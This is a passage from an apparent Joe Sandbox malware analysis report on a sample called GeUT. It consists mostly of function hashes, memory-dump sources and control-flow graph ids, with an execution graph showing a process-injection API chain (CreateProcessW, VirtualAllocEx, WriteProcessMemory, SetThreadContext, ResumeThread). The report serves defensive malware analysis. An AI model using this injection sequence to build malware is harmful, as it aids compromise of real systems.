                                • Instruction ID: 07502eabc99074d7c65f414de5f910474b135e69e10dcffa075efebbcf72076a
                                • Opcode Fuzzy Hash: f70a24de824a1b957aee01cc60b90b9eff6d0628243f749688cc852730ea9a16
                                • Instruction Fuzzy Hash: 72E012F090120DEBD710DFB4D641A9EB778FB41205F509794E40423210DB71AE41D795
                                Function 07CB4498 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7e29bb08f232cbc1da237b178814810b4702a719372c1f04a9328109c1e883a
                                • Instruction ID: cefa6c8f77ed99d870aabc0dd48f74dddf0f8d076f9f7a069a687b6eb0da9572
                                • Opcode Fuzzy Hash: b7e29bb08f232cbc1da237b178814810b4702a719372c1f04a9328109c1e883a
                                • Instruction Fuzzy Hash: 2DE012F090520DEBC714DFA4D541A9EF779EB42219F109794A80423211DB75AE41DB95
                                Function 07CBF7E8 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab0be65b1882ac87d0343a5205f4cce2db6580815f35093c7ce5815f3884739c
                                • Instruction ID: cd3ba608047c913f4eb79e4137d4b28edd67ce9b79a1fd32a2e191357e5600e7
                                • Opcode Fuzzy Hash: ab0be65b1882ac87d0343a5205f4cce2db6580815f35093c7ce5815f3884739c
                                • Instruction Fuzzy Hash: 3CE0ECB0D1130CEFCB54EFB8D45569DBBB5EB05201F6081A9DC08A3350E7359E91DB81
                                Function 07CB7D08 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9b3cafbda5a71f8a22867145dd87f81b1084ce11ea1c3a451a60d1dc867fdb76
                                • Instruction ID: cc4f337c51f33647255edad9152864b3aaa36f1b452f1ef43ab716e0309ad195
                                • Opcode Fuzzy Hash: 9b3cafbda5a71f8a22867145dd87f81b1084ce11ea1c3a451a60d1dc867fdb76
                                • Instruction Fuzzy Hash: F3E0ECB4D1030CAFDB94DFB8D95A7ADBBF4EB48201F5081A9E80493240EA755A82DB41
                                Function 07CFFBD0 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82c1f94759ac00e9891fe9e394b27818011eeda60f797f50cd91b7bc5d9404f6
                                • Instruction ID: 9aab1a03c0beaf103585c7db56ed9196ccf34ebf4832aef8b6367277f036d4a6
                                • Opcode Fuzzy Hash: 82c1f94759ac00e9891fe9e394b27818011eeda60f797f50cd91b7bc5d9404f6
                                • Instruction Fuzzy Hash: EFE0C2B0D092849FC325CBA4A4193693F38FB02205F0441DEDD0857692C7380D51DB52
                                Function 07D14784 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: edfbf6d1b577a496a8eccac1826331649c0c543e7ab4b92d4905ecc269966656
                                • Instruction ID: b705fc27573bc1a72f6fd5d37f59fe3d0757bb0542fc6fa5e96d17ec884e68aa
                                • Opcode Fuzzy Hash: edfbf6d1b577a496a8eccac1826331649c0c543e7ab4b92d4905ecc269966656
                                • Instruction Fuzzy Hash: 1FD052BAE00108EADB00DFC0F840AEDFB72EB89330F104022D69026200C3328AA0CBE1
                                Function 07CFFBE0 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98e70e8e6a729b7ed23eff7337df81a30ddf68afbb57471849f4cf0f6e9e7cd4
                                • Instruction ID: 51d41396f7886bf7ccdba6afe25fab2388ceca56ab7e5edec0751f2e806fe1aa
                                • Opcode Fuzzy Hash: 98e70e8e6a729b7ed23eff7337df81a30ddf68afbb57471849f4cf0f6e9e7cd4
                                • Instruction Fuzzy Hash: 38D022B090020CEBD350CBD8D41A72EB77CE702611F10019CAC0803380CB345E82C791
                                Function 07D15AD0 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b93584ec944e5f0f8190438d2d8ef259490d0a34a808bd53c5a18b8569ba4f74
                                • Instruction ID: 4dc45778ed565985da38c28f0d96e0c3853fcfddf1a140de0fcf29eed1e5f9d1
                                • Opcode Fuzzy Hash: b93584ec944e5f0f8190438d2d8ef259490d0a34a808bd53c5a18b8569ba4f74
                                • Instruction Fuzzy Hash: 7BC0021250DBC64AEB0793340D664117F6058534087EE41DAC0E2EA993D508C95683A3
                                Function 07CBC931 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d3fccbc3f2e4e24f530e38be5e8a37ead97612409601a229179f22aeb4bbd2c3
                                • Instruction ID: 886c715826d02df79f8aebeb1e6cd4de02f3d96136d449f9ea78e178183a8b8c
                                • Opcode Fuzzy Hash: d3fccbc3f2e4e24f530e38be5e8a37ead97612409601a229179f22aeb4bbd2c3
                                • Instruction Fuzzy Hash: D6D0123324F3D05FC70387B09955AEABF719F56310F16458BE1C08909381640681DB63
                                Function 07D10FA1 Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a70c7f80e19deab84f06bf6b94136bd2868ae6f77aa261df18d38c0d1e5d5a1
                                • Instruction ID: 7627154463bc3d600caab327efaf9cf66fa256a7d3f242df20c3502415472ac9
                                • Opcode Fuzzy Hash: 0a70c7f80e19deab84f06bf6b94136bd2868ae6f77aa261df18d38c0d1e5d5a1
                                • Instruction Fuzzy Hash: A5C0127464D3C15FD70397304D55B55BF711F43200F0941E7E1D4CA4A7C3144815D712
                                Function 07CB8AE8 Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f786c8a86ac6a5e3d2ce0dee25ffeaafe382d06b759893d033e587a46d5c1496
                                • Instruction ID: dab34cf7c44f641145ed34ff4ea3dc3d0cbf95765984d95f115f61359cb4c52b
                                • Opcode Fuzzy Hash: f786c8a86ac6a5e3d2ce0dee25ffeaafe382d06b759893d033e587a46d5c1496
                                • Instruction Fuzzy Hash: 6EB0927090530CAF8620DA99980195AB7ACDA4AA10B4001D9F90887320DA72AA1066D2

                                Non-executed Functions

                                Function 07CB6538 Relevance: .3, Instructions: 306COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ba612ec29193efd93c54e2c5acca17e553c506212c076827fc35c7fc2a060fc
                                • Instruction ID: 8caf41aa77afd94607abf924f93e62089cebe7daa2d8f5f8037d1583069de20f
                                • Opcode Fuzzy Hash: 1ba612ec29193efd93c54e2c5acca17e553c506212c076827fc35c7fc2a060fc
                                • Instruction Fuzzy Hash: EFE1B0B4E01228CFDB24DFA9D984B9DBBB2BF89305F1081A9D409B7251DB355A86CF50
                                Function 07CB3BD0 Relevance: .3, Instructions: 301COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f72dbd3964432f81b68240797a830d5197793da8fc063fefe61c97df8784d40f
                                • Instruction ID: 316031c7ff4f918cc04f676eff2698b915b78f079c78d52068059333018ebac4
                                • Opcode Fuzzy Hash: f72dbd3964432f81b68240797a830d5197793da8fc063fefe61c97df8784d40f
                                • Instruction Fuzzy Hash: 1EE1A2B4D01228CFDB24DFA9D984B9DBBB2FF89301F1081A9D409A7355DB359A86CF50

                                Execution Graph

                                Execution Coverage:30.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:42
                                Total number of Limit Nodes:4
                                execution_graph 3938 5181fd8 ReadProcessMemory 3939 5182097 3938->3939 3940 5185f98 3941 5185fb2 3940->3941 3942 5186001 3941->3942 3944 5186450 3941->3944 3945 5186483 3944->3945 3948 5184024 3945->3948 3947 5186677 3947->3941 3949 5186eb0 CreateProcessW 3948->3949 3951 5187096 3949->3951 3956 5182338 ResumeThread 3957 51823c0 3956->3957 3958 51821f8 3959 5182261 3958->3959 3960 5182276 WriteProcessMemory 3958->3960 3959->3960 3961 51822d8 3960->3961 3981 5181ec8 3982 5181f3b Wow64SetThreadContext 3981->3982 3983 5181f26 3981->3983 3984 5181f84 3982->3984 3983->3982 3985 5181ba8 3986 5181c35 CreateProcessW 3985->3986 3988 5181d8e 3986->3988 3988->3988 3962 51871d0 3964 51871ea 3962->3964 3963 5187239 3964->3963 3967 5187288 3964->3967 3971 5187279 3964->3971 3969 51872bb 3967->3969 3975 518614c 3969->3975 3970 51874af 3970->3964 3973 5187288 3971->3973 3972 518614c CreateProcessW 3974 51874af 3972->3974 3973->3972 3974->3964 3976 5187ce8 CreateProcessW 3975->3976 3978 5187ece 3976->3978 3979 51820f0 VirtualAllocEx 3980 51821a7 3979->3980 3989 5184e40 3990 5184ecd CreateProcessW 3989->3990 3992 5185026 3990->3992

                                Executed Functions

                                Function 05185C6C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 600 5185c6c-5185d03 601 5185d1a-5185d28 600->601 602 5185d05-5185d17 600->602 603 5185d2a-5185d3c 601->603 604 5185d3f-5185d7b 601->604 602->601 603->604 605 5185d7d-5185d8c 604->605 606 5185d8f-5185e5c CreateProcessW 604->606 605->606 610 5185e5e-5185e64 606->610 611 5185e65-5185f24 606->611 610->611 621 5185f5a-5185f65 611->621 622 5185f26-5185f4f 611->622 626 5185f66 621->626 622->621 626->626
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185E49
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 959621d0836bae18c10e86885a7ab515db08e5d3737d65fcdbfc84eee44913c1
                                • Instruction ID: 93d8197136911e427c2dc96ca37dead8def314366a2f638a67791ecdd0e7433b
                                • Opcode Fuzzy Hash: 959621d0836bae18c10e86885a7ab515db08e5d3737d65fcdbfc84eee44913c1
                                • Instruction Fuzzy Hash: F481DF75D0022ADFDB21DFA5C980BEDBBF5BB49300F1091AAE509B7260DB349A85CF54
                                Function 05187CDC Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 682 5187cdc-5187d73 684 5187d8a-5187d98 682->684 685 5187d75-5187d87 682->685 686 5187d9a-5187dac 684->686 687 5187daf-5187deb 684->687 685->684 686->687 688 5187ded-5187dfc 687->688 689 5187dff-5187ecc CreateProcessW 687->689 688->689 693 5187ece-5187ed4 689->693 694 5187ed5-5187f94 689->694 693->694 704 5187fca-5187fd5 694->704 705 5187f96-5187fbf 694->705 708 5187fd6 704->708 705->704 708->708
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187EB9
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 02b0078b4956fabcc2a9f27730ecad02c988139231fc16c500e8c9994b454e1f
                                • Instruction ID: 8b0c53214fdf20581e8fb5f5651ff9ecfd2338cd2bedfd115fe4d6940518561c
                                • Opcode Fuzzy Hash: 02b0078b4956fabcc2a9f27730ecad02c988139231fc16c500e8c9994b454e1f
                                • Instruction Fuzzy Hash: C981C275D00229DFDB20DFA5C884BEDBBF5BB49300F1091AAE509B7260DB319A85DF54
                                Function 05184E34 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 573 5184e34-5184ecb 574 5184ecd-5184edf 573->574 575 5184ee2-5184ef0 573->575 574->575 576 5184ef2-5184f04 575->576 577 5184f07-5184f43 575->577 576->577 578 5184f45-5184f54 577->578 579 5184f57-5185024 CreateProcessW 577->579 578->579 583 518502d-51850ec 579->583 584 5185026-518502c 579->584 594 51850ee-5185117 583->594 595 5185122-518512d 583->595 584->583 594->595 599 518512e 595->599 599->599
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185011
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 8e0774e738fae0145016bc59166b7d9bdaec5cef65f8ae5ed57b0e92b99679af
                                • Instruction ID: 3384682e0ba9f4d8e9359f240522f91488514079955d7326c6f4063090b87515
                                • Opcode Fuzzy Hash: 8e0774e738fae0145016bc59166b7d9bdaec5cef65f8ae5ed57b0e92b99679af
                                • Instruction Fuzzy Hash: E581D075D0026ADFDF20DFA5C980BEDBBB1BB49300F1491AAE508B7260DB749A85CF54
                                Function 05186EA4 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 655 5186ea4-5186f3b 656 5186f3d-5186f4f 655->656 657 5186f52-5186f60 655->657 656->657 658 5186f62-5186f74 657->658 659 5186f77-5186fb3 657->659 658->659 660 5186fb5-5186fc4 659->660 661 5186fc7-5187094 CreateProcessW 659->661 660->661 665 518709d-518715c 661->665 666 5187096-518709c 661->666 676 518715e-5187187 665->676 677 5187192-518719d 665->677 666->665 676->677 681 518719e 677->681 681->681
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187081
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7798f3db26eaebba92010a10e4c7f9bcd38887be4d9e8b775d76616556686505
                                • Instruction ID: ce69278b3b39e14a4a20539adfec8dde5c2fc48c46a0b8d5e4850bba9ce807b3
                                • Opcode Fuzzy Hash: 7798f3db26eaebba92010a10e4c7f9bcd38887be4d9e8b775d76616556686505
                                • Instruction Fuzzy Hash: 7B81C275D0026ACFDB20DFA5C880BEDBBB5BF49300F1091AAE509B7260DB359A85CF54
                                Function 0518614C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 627 518614c-5187d73 629 5187d8a-5187d98 627->629 630 5187d75-5187d87 627->630 631 5187d9a-5187dac 629->631 632 5187daf-5187deb 629->632 630->629 631->632 633 5187ded-5187dfc 632->633 634 5187dff-5187ecc CreateProcessW 632->634 633->634 638 5187ece-5187ed4 634->638 639 5187ed5-5187f94 634->639 638->639 649 5187fca-5187fd5 639->649 650 5187f96-5187fbf 639->650 653 5187fd6 649->653 650->649 653->653
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187EB9
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 28eaf9c4a1e2990572d4d7a2d7b451b06d9d2d60b0b257fd0668c56ff6b46591
                                • Instruction ID: 83f6f404603a36af529b534231338c501bbc5c1faf9a53424490de93bbc94c56
                                • Opcode Fuzzy Hash: 28eaf9c4a1e2990572d4d7a2d7b451b06d9d2d60b0b257fd0668c56ff6b46591
                                • Instruction Fuzzy Hash: AE81C275D0026ACFDB24DFA5C884BEDBBF5BB49300F1091AAE509B7250DB319A85CF54
                                Function 05184024 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 545 5184024-5186f3b 547 5186f3d-5186f4f 545->547 548 5186f52-5186f60 545->548 547->548 549 5186f62-5186f74 548->549 550 5186f77-5186fb3 548->550 549->550 551 5186fb5-5186fc4 550->551 552 5186fc7-5187094 CreateProcessW 550->552 551->552 556 518709d-518715c 552->556 557 5187096-518709c 552->557 567 518715e-5187187 556->567 568 5187192-518719d 556->568 557->556 567->568 572 518719e 568->572 572->572
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187081
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7fdc4e93c17534bf83dd6c14d667f6966d7ca6b19db3c2e64f59030d63135032
                                • Instruction ID: 8e8cec6e5ab400a09dad46b1d165a812f9745e5793da5ef8afa98510a5a83f41
                                • Opcode Fuzzy Hash: 7fdc4e93c17534bf83dd6c14d667f6966d7ca6b19db3c2e64f59030d63135032
                                • Instruction Fuzzy Hash: A481C075D0026ACFDB20DFA5C884BEDBBF5BB49300F1091AAE509B7260DB719A85CF54
                                Function 05181B9C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 516 5181b9c-5181c33 519 5181c4a-5181c58 516->519 520 5181c35-5181c47 516->520 521 5181c5a-5181c6c 519->521 522 5181c6f-5181cab 519->522 520->519 521->522 523 5181cad-5181cbc 522->523 524 5181cbf-5181d8c CreateProcessW 522->524 523->524 528 5181d8e-5181d94 524->528 529 5181d95-5181e54 524->529 528->529 539 5181e8a-5181e95 529->539 540 5181e56-5181e7f 529->540 544 5181e96 539->544 540->539 544->544
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05181D79
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 6590fdee18682e46230c31e3371baae06af796a0a04f26535dc45eb809aa4f25
                                • Instruction ID: 77613aee5ca1bcbb6ece81092023c030a3d3477f1ab91bb55f6f24db1c4bda3a
                                • Opcode Fuzzy Hash: 6590fdee18682e46230c31e3371baae06af796a0a04f26535dc45eb809aa4f25
                                • Instruction Fuzzy Hash: CB81D375D00229DFDB21DFA5C980BEDBBF5BB49300F1091AAE509B7250DB309A89CF54
                                Function 05185C78 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 5185c78-5185d03 765 5185d1a-5185d28 764->765 766 5185d05-5185d17 764->766 767 5185d2a-5185d3c 765->767 768 5185d3f-5185d7b 765->768 766->765 767->768 769 5185d7d-5185d8c 768->769 770 5185d8f-5185e5c CreateProcessW 768->770 769->770 774 5185e5e-5185e64 770->774 775 5185e65-5185f24 770->775 774->775 785 5185f5a-5185f65 775->785 786 5185f26-5185f4f 775->786 790 5185f66 785->790 786->785 790->790
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185E49
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 1ae895dcc9e65c1cbcf68af4904e50b2682f62b9826579f426de31029adb0a50
                                • Instruction ID: f26da7655de946f3375e355cf9740c095ee9b64ff9b530fe2594d2fa41b0be36
                                • Opcode Fuzzy Hash: 1ae895dcc9e65c1cbcf68af4904e50b2682f62b9826579f426de31029adb0a50
                                • Instruction Fuzzy Hash: C881C075D0022ADFDB20DFA5C880BEDBBF5BB49300F1091AAE509B7260DB349A85CF54
                                Function 05184E40 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 737 5184e40-5184ecb 738 5184ecd-5184edf 737->738 739 5184ee2-5184ef0 737->739 738->739 740 5184ef2-5184f04 739->740 741 5184f07-5184f43 739->741 740->741 742 5184f45-5184f54 741->742 743 5184f57-5185024 CreateProcessW 741->743 742->743 747 518502d-51850ec 743->747 748 5185026-518502c 743->748 758 51850ee-5185117 747->758 759 5185122-518512d 747->759 748->747 758->759 763 518512e 759->763 763->763
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185011
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 4f75bed3afc41dd2db3caa1943b02bb9dcd1a509b781482c998c7c1c1c5f1c89
                                • Instruction ID: 53ba86d4eb087971acf472ad33df198c7a849a01222884c2a191005b3b55dc5d
                                • Opcode Fuzzy Hash: 4f75bed3afc41dd2db3caa1943b02bb9dcd1a509b781482c998c7c1c1c5f1c89
                                • Instruction Fuzzy Hash: 2681BF75D0026ADFDF20DFA5C880BEDBBB5BB49300F1091AAE509B7260DB749A85CF54
                                Function 05181BA8 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 710 5181ba8-5181c33 711 5181c4a-5181c58 710->711 712 5181c35-5181c47 710->712 713 5181c5a-5181c6c 711->713 714 5181c6f-5181cab 711->714 712->711 713->714 715 5181cad-5181cbc 714->715 716 5181cbf-5181d8c CreateProcessW 714->716 715->716 720 5181d8e-5181d94 716->720 721 5181d95-5181e54 716->721 720->721 731 5181e8a-5181e95 721->731 732 5181e56-5181e7f 721->732 736 5181e96 731->736 732->731 736->736
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05181D79
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ae9f1cd5e9e4839b3775378a4d3bc7b1bd85fe0ecd394a631d7910be0ae40682
                                • Instruction ID: f6db85d50c62fc06c5b4e06f434ddae02bddf594b722129d9669d59bc9e46243
                                • Opcode Fuzzy Hash: ae9f1cd5e9e4839b3775378a4d3bc7b1bd85fe0ecd394a631d7910be0ae40682
                                • Instruction Fuzzy Hash: F381C175D00229DFDB21DFA5C980BEDBBF5BB49300F1095AAE509B7260DB309A89CF54
                                Function 051821F0 Relevance: 1.6, APIs: 1, Instructions: 111injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 791 51821f0-518225f 792 5182261-5182273 791->792 793 5182276-51822d6 WriteProcessMemory 791->793 792->793 794 51822d8-51822de 793->794 795 51822df-518231d 793->795 794->795
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051822C6
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 6812691347fe2ff8116778af30b9997fdc79240ad59fac14781f2d075f1d22a3
                                • Instruction ID: 16de8aeb699a5778f9b0eeb33e5e38284aa466baf3257dcabdce4fe67b9e7849
                                • Opcode Fuzzy Hash: 6812691347fe2ff8116778af30b9997fdc79240ad59fac14781f2d075f1d22a3
                                • Instruction Fuzzy Hash: 01416AB9D042589FCB11CFA9D984AEDFBF1BB49310F24902AE818B7250D375AA45CF64
                                Function 051821F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051822C6
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fc186a04a65b97b194f67565bc04ed5eed9ac62e7832bb18b3e1126d9ce32cb8
                                • Instruction ID: 2a8725dab57b7846e3d0bb3597f2cac824e15d8e3b0fb2c7d3cb268aa6478908
                                • Opcode Fuzzy Hash: fc186a04a65b97b194f67565bc04ed5eed9ac62e7832bb18b3e1126d9ce32cb8
